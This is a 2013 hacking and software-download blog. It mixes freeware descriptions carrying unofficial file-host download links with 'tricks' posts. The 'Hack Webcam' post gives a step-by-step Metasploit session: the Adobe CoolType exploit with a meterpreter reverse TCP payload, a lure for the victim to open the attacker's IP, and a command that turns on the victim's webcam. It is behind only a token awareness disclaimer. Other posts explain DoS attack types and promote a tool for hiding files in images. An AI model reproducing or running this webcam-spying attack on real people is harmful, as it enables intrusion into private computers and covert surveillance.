Saturday 27 April 2013

INVISIBLE SECRETS 2.1

                                      INVISIBLE SECRETS 2.1





With this program, you can hide/encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone secretly without exposing it to world and your friend or other person can decrypt it on other end using this software. You can also specify the password for encryption and decryption. The person on other end can only decrypt the file if he has this software and knows the encryption password. With this software, you can also:
  • Delete carrier file after process
  • Add fake files to play pranks on friends 
  • Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images which are default

To Download
http://muchshare.net/u0ha65wyk8f4
http://royalvids.eu/u0ha65wyk8f4
http://ul.to/ure0nfwa



Google Chrome

Google Chrome 27.0.1453.65 Beta

Google - 32.08MB (Open Source) - beta






Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier.
One box for everything
Type in the address bar and get suggestions for both search and web pages.
Thumbnails of your top sites
Access your favorite pages instantly with lightning speed from any new tab.
Incognito mode
Don't want pages you visit to show up in your web history? Choose incognito mode for private browsing.
Safe browsing
Google Chrome warns you if you're about to visit a suspected phishing, malware or otherwise unsafe website.

To Download 
http://muchshare.net/ec9xuh31kgc5
http://royalvids.eu/ec9xuh31kgc5
http://ul.to/51bkleud


Sunday 31 March 2013

Hack Webcam

                                        Hack Webcam

Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and  take security yourself.

Open Metasploit and run following commands:


msf>  show exploits


msf>use windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name                Current Setting       Required           Description
   ----                     ---------------               --------               -----------
   SRVHOST            0.0.0.0                   yes              The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT             8080                      yes              The local port to listen on.
   SSL                         false                         no                Negotiate SSL for incoming connections
   SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
   SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                              no               The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name                  Current            Setting         Required  Description
   ----                    ---------------       --------              -----------
   EXITFUNC        process             yes               Exit technique: seh, thread, process, none
   LHOST                                             yes                The listen address
   LPORT                 4444                 yes               The listen port



Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.


msf  exploit(adobe_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)

http://muchshare.net/czclxmot1rmr

Install window XP In 10 Min.

                                  Install window XP In 10 Min.

>>Hey Guys Diz Time Extreme Hack That You Will Never Imagine But Its Truth and We have Done It. This Time I will explain How to Install Windows XP In Just 10 minutes.<< Read On Enjoyyyyyy!~
As We all know that During Formatting a Computer After the File Copying is Completed then windows Require 39 Minutes Time...But What Extreme In It.... Yes We can Bypass this faking Time .... How TO DO IT??? So read On..
I have Included Snaps Shots That will help you.

>> INSTALLING WIN XP IN 10 MINUTES! <<
STEP1 : After the Copy Part is Over ... System is Rebooted as we all know In general Foramatting Procedure...
Now After Reboot and open 39 Min Setup Box then.........


STEP 2: Now As This Image APPEARS You Have to Press  "Shift + F10 "  . This Will Open The command Prompt...  Now type  taskmgr  in it. This will open the Task manager .

STEP 3 : After The task Manager Opens Goto Processes ... And Find "Setup.exe"  process and Right CLICK on It.... and set the Priority to Highest....





STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....

Thats the Overall Tutorial...Hope You all Have LIKED IT...

So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes....Enjoy Hacking.~


Chat with Friends through Command Prompt

                Chat with Friends through Command Prompt


 Hello friends Now U Can Chat With Command Prompt Through So Here IS A Trick.....

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
DONE....ENJOY.~!!

DOS Attacks

                                      DOS Attacks



Denial of service (DOS) attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.

Types:
Teardrop attack is type of attack where fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Ping of death type of DoS attack in which the attacker sends a ping request that is larger than 65,536 bytes, which is the maximum size that IP allows. While a ping larger than 65,536 bytes is too large to fit in one packet that can be transmitted, TCP/IP allows a packet to be fragmented, essentially splitting the packet into smaller segments that are eventually reassembled. Attacks took advantage of this flaw by fragmenting packets that when received would total more than the allowed number of bytes and would effectively cause a buffer overload on the operating system at the receiving end, crashing the system. Ping of death attacks are rare today as most operating systems have been fixed to prevent this type of attack from occurring.  

DDOS Attack: A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. This is the result of multiple compromised systems (for example a botnet) flooding the targeted system(s) with traffic. When a server is overloaded with connections, new connections can no longer be accepted.


Peer to Peer Attack Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses.


For all known DOS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks.
  Disclaimer:- All The Tricks Are Knowledge Purpose Only, HOC Are Not  Responsible For Any Kind Of Damage Or Insufficient Thing.!! 





Sunday 24 March 2013

Process Explorer 15.30

                            Process Explorer 15.30

                                                  Microsoft SysInternals - 1.11MB (Freeware



Process Explorer shows you information about which handles and DLLs processes have openeloaded.
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.
The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.


To Download 
http://muchshare.net/wh1q53qzcb30
http://ul.to/yvh48xjj


Ultra VNC 1.1.8.6

Ultra VNC 1.1.8.6

Ultra VNC Team - 3.27 MB (Open Source)



UltraVNC is a powerful, easy to use and free software that can display the screen of another computer (via internet or network) on your own screen. The program allows you to use your mouse and keyboard to control the other PC remotely. It means that you can work on a remote computer, as if you were sitting in front of it, right from your current location. If you provide computer support, you can quickly access your customer's computers from anywhere in the world and resolve helpdesk issues remotely! With addons like SingleClick your customers don't even have to pre-install software or execute complex procedures to get remote helpdesk support.
Key features: File transfer, Video driver, Optional Encryption Plugins, MS Logon, Text chat, Viewer Toolbar, Java Viewer with File Transfer , as well as Auto scaling and Server Side Scaling, Multiple-Monitors-support,Repeater/Proxy-support, Auto reconnection, good performances and tons of other functionalities.


To Download
http://muchshare.net/leo7vgyyuhap
http://ul.to/dinl7030

McAfee Labs Stinger 11.0.0.200

McAfee Labs Stinger 11.0.0.200

McAfee Labs - 10.57 MB (Freeware)




Stinger is a quick and installation-free standalone tool for detecting and removing prevalent malware and threats, ideal if your PC is already infected. While not a replacement for full fledged antivirus software, Stinger is updated multiple times a week to include detection for newer Fake Alert variants and prevalent viruses.



To Download  
http://muchshare.net/qlotbg8ym5no
http://ul.to/z4h9ssup

Saturday 16 March 2013

Peer Block 1.1

Peer Block 1.1

Peer Block, LLC - 2.01 MB (Open Source)


Peer Block lets you control who your computer "talks to" on the Internet. By selecting appropriate lists of "known bad" computers, you can block communication with advertising or spyware oriented servers, computers monitoring your p2p activities, computers which have been "hacked", even entire countries!
They can't get in to your computer, and your computer won't try to send them anything either.
And best of all, it's free!
Peer Block is a continuation of Peer Guardian.

To Download 

http://muchshare.net/71r2cb56235c
http://ul.to/5rqur096

Password Safe 3.30

Password Safe 3.30

Rony Shapiro - 12.37 MB (Open Source)




Password Safe allows you to manage your old passwords and to easily and quickly generate, store, organize, retrieve, and use complex new passwords, using password policies that you control. Once stored, your user names and passwords are just a few clicks away.
Using Password Safe you can organize your passwords using your own customization references - for example, by user ID, category, web site, or location. You can choose to store all your passwords in a single encrypted master password list (an encrypted password database), or use multiple databases to further organize your passwords (work and home, for example). And with its intuitive interface you will be up and running in minutes.



To Download 
http://muchshare.net/en4920g83s12
http://ul.to/5rqur096

Feed Reader 3.14

Feed Reader 3.14

Feed Reader - 5.56 MB (Freeware)



Feed reader is the most robust, highly-functional personal aggregation solution on the market today. It dynamically reads, collects, and organizes syndicated Web content, and seamlessly delivers it directly to user desktops. With Feed reader, you have instant, convenient access to the up-to-the-minute news you need, without information overload.
Feed reader automatically downloads updates from your favorite Web sites. So, it eliminates the need for you to constantly monitor multiple Web pages, while allowing you to immediately identify and retrieve new articles - no matter how long you've been away from your desk.
Feed reader provides cutting-edge features in an intuitive, user-friendly environment. Even non-technical users can view comprehensive, consolidated information from across the Internet - faster and easier than ever before.
Feed Reader was open source until version 2.9 and continues to be freeware from version 3.0 on wards.


To Download
http://muchshare.net/4675u8kpnukx
http://ul.to/gcfsfngh

Many Cam Free 3.1.43

Many Cam Free 3.1.43

Many Cam - 19.28 MB (Freeware)


Use your webcam with many applications simultaneously.
Use Skype, MSN, Ustream, and many other webcam and audio applications at the same time. You can also do the same with virtual audio sound driver.
Add amazing microphone audio effects to your broadcast.
Use voice changer technology to disguise your voice for a screen cast voice over, make people laugh, or use it to trick your friends and family. Many Cam is also able to make your microphone & headset audio quality sound better than most normal audio drivers.
Draw over your video window.
Use built in image editing software to draw over or add text to your live video broadcast. Draw over your video while in Skype, You tube, or any other video software. Just add Many Cam as your video source for any app!
Screen cast your desktop
Record your desktop and save the video to your hard drive. You can also screencast live to live video chat services like Ustream, Justin.tv, Skype, and more. Use Many Cam as your video source on Youtube to record a video of your desktop.
Picture in Picture
Broadcast "pnp" or picture in picture video with ManyCam. Screencast your desktop while showing yourself in a smaller video window within that window. Picture in picture is useful for video demonstrations on webcam and live shows. Turn your computer into live news studio with ManyCam's pnp feature.
Switch between different video sources.
Go to the ManyCam Studio Pro tab to quickly switch between video sources. ManyCam Studio Pro allows up to 6 video sources and the ability to cut or slowly transition between different sources. Use the ManyCam pull-down menu in the source window to add another camera, still image, photo snapshot, a pre-recorded video, and even a desktop screencast as your video source. Turn your computer into a Pro live video production studio with ManyCam.
Create your own custom webcam effects.
Make custom webcam face effects, eye effects, mouth effects, hair effects and any other type of webcam graphic. Share the custom effect with the rest of the ManyCam community or keep it for yourself.




To Download 

http://muchshare.net/sxicv2l6jyeu
http://ul.to/odglcwkl

Java Run time Environment 1.7


Java Run time Environment 1.7.0.17 (32-bit)

Oracle - 30.06 MB (Freeware)



Java software allows you to run applications called "applets" that are written in the Java programming language. These applets allow you to have a much richer experience online than simply interacting with static HTML pages.
Java Plug-in technology, included as part of the Java 2 Runtime Environment, Standard Edition (JRE), establishes a connection between popular browsers and the Java platform. Java allows applications to be downloaded over a network and run within a guarded sandbox. Security restrictions are easily imposed on the sandbox.
Many cross platform applications also require Java to operate properly.


To Download
http://muchshare.net/q0sis9n0k9a3
http://ul.to/6sexelnl

Sunday 10 March 2013

Beyond Compare 3.3.7

Beyond Compare 3.3.7

Scooter Software Inc - 5.66MB (Shareware)



Beyond Compare 3 is the ideal tool for comparing files and folders on your Windows system. Visualize changes in your code and carefully reconcile them.
  • Compare Files, Folders
    Beyond Compare allows you to quickly and easily compare your files and folders. By using simple, powerful commands you can focus on the differences you're interested in and ignore those you're not. You can then merge the changes, synchronize your files, and generate reports for your records.
  • Specialized Viewers
    Beyond Compare includes built-in comparison viewers for a variety of data types. Compare .csv data or HTML tables in a Data Compare session, or images in a Picture Compare session.
  • 3-way Merge
    Beyond Compare's new merge view allows you to combine changes from two versions of a file into a single output. Its intelligent approach allows you to quickly accept most changes while carefully examining conflicts.
  • Synchronize Folders
    Beyond Compare's intuitive Folder Sync interface lets you reconcile differences in your data automatically.

To Download
http://ul.to/mt1l5fo4
http://muchshare.net/pne8v1njpdye

PeaZip 4.9.0

PeaZip 4.9.0

Giorgio Tani - 5.09MB (Open Source)


PeaZip is an open source file and archive manager. It's freeware and free of charge for any use.
PeaZip can extract most of archive formats both from Windows and Unix worlds, ranging from mainstream 7Z, RAR, TAR and ZIP to experimental ones like PAQ/LPAQ family, currently the most powerful compressor available.
For archive creation, PeaZip suppors a wide range of compression and encryption standard, from fastes to most powerful ones, and allows to export job definition as scripts to bridge the gap between GUI and console applications, and let the user pick the best of the two worlds.
PeaZip has secure deletion feature, can verify file checksum and hash, and supports multiple strong encryption standards, optionally using two factor authentication (password and keyfile) for increased security:
  • 7Z's AES256 encryption
  • ZIP WinZip's AE encryption based on AES256 (and ZipCrypto for legacy compatibility); can decrypt PKZip's AES encryption
  • FreeARC's ARC: AES256, Blowfish, Twofish256 and Serpent256 - this format is also capable to generate recovery records to protect data against corruption
  • PEA: AES256 EAX authenticated encryption
To Download
http://muchshare.net/pzwq0xldkh7x
http://ul.to/49tmc87z

Sunday 3 March 2013

.NET Framework Version 4.5

.NET Framework Version 4.5

Microsoft Corporation - 48.02MB (Freeware

The .NET Framework is Microsoft's comprehensive and consistent programming model for building applications that have visually stunning user experiences, seamless and secure communication, and the ability to model a range of business processes.
The Microsoft .NET Framework 4 redistributable package installs the .NET Framework runtime and associated files that are required to run and develop applications to target the .NET Framework 4.
The .NET Framework 4 works side by side with older Framework versions. Applications that are based on earlier versions of the Framework will continue to run on the version targeted by default.
.NET Framework 4 includes the following new features and improvements:
  • Improvements in CLR and BCL
  • Improvements in ADO.NET
  • Enhancements to ASP.NET
  • Improvements in Windows Presentation Foundation
  • Improvements to Windows Workflow Foundation and Windows Communication Foundation

To Download 
http://muchshare.net/38uzjk2nubec

Window Blinds 7.4

Window Blinds 7.4

Star dock - 65.23 MB (Shareware)

Window Blinds is a software utility that allows you to completely change the look and feel of Microsoft Windows.
It works by applying new visual styles, called skins, across the entire user interface (title bars, push buttons, start menu, taskbar, etc.) of the operating system. As a result, you gain complete control over the way Windows looks.
As good as someone might think Windows looks, it is a one-size fits all solution. Window Blinds gives users thousands of new looks to choose from.
With skins, Window Blinds can change the look of:
  • Title bars
  • Borders
  • The Start bar
  • Progress animations
  • Explorer Views
  • and virtually every other part of Windows!

To Download 
http://ul.to/rp2xfxro
http://muchshare.net/zpffi4gzyjfl



Sunday 24 February 2013

ImgBurn 2.5.7.0

ImgBurn 2.5.7.0

Lightning UK - 5.84MB (Freeware)


ImgBurn is a lightweight CD / DVD / HD DVD / Blu-ray burning application that everyone should have in their toolkit!
It has several 'Modes', each one for performing a different task:
  • Read - Read a disc to an image file
  • Build - Create an image file from files on your computer or network - or you can write the files directly to a disc
  • Write - Write an image file to a disc
  • Verify - Check a disc is 100% readable. Optionally, you can also have ImgBurn compare it against a given image file to ensure the actual data is correct
  • Discovery - Put your drive / media to the test! Used in combination with DVDInfoPro, you can check the quality of the burns your drive is producing

To Download
http://muchshare.net/llxepls4eapi

FileZilla 3.6.0.2

FileZilla 3.6.0.2

FileZilla - 4.48MB (Open Source)




File Zilla Client is a fast and reliable cross-platform FTP, FTPS and SFTP client with lots of useful features and an intuitive graphical user interface.
Among others, the features of FileZilla include the following:
  • Easy to use
  • Supports FTP, FTP over SSL/TLS (FTPS) and SSH File Transfer Protocol (SFTP)
  • IPv6 support
  • Available in many languages
  • Supports resume and transfer of large files greater than 4GB
  • Powerful Site Manager and transfer queue
  • Bookmarks
  • Drag & drop support
  • Configurable transfer speed limits
  • Filename filters
  • Network configuration wizard
  • Remote file editing
  • Keep-alive
  • HTTP/1.1, SOCKS5 and FTP-Proxy support
  • Logging to file

To Download
http://ul.to/jnozjr5w
http://muchshare.net/l61016y1yxgh


Process Explorer 15.30

Process Explorer 15.30

Microsoft Sys Internals - 1.11 MB (Freeware)




Process Explorer shows you information about which handles and DLLs processes have opened or loaded.
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.
The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.


To Download 
http://ul.to/i3v79pku
http://muchshare.net/tfwtmcmeacsi

Google Chrome


Google Chrome 25.0.1364.97

Google - 30.92 MB (Open Source)



Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier.
One box for everything
Type in the address bar and get suggestions for both search and web pages.
Thumbnails of your top sites
Access your favorite pages instantly with lightning speed from any new tab.
Incognito mode
Don't want pages you visit to show up in your web history? Choose incognito mode for private browsing.
Safe browsing
Google Chrome warns you if you're about to visit a suspected phishing, malware or otherwise unsafe website.
For information about alpha and developer builds, check out the Chrome dev channel here.

To Download :-
http://ul.to/t1oz3j2b
http://muchshare.net/4k5ew74w9tw9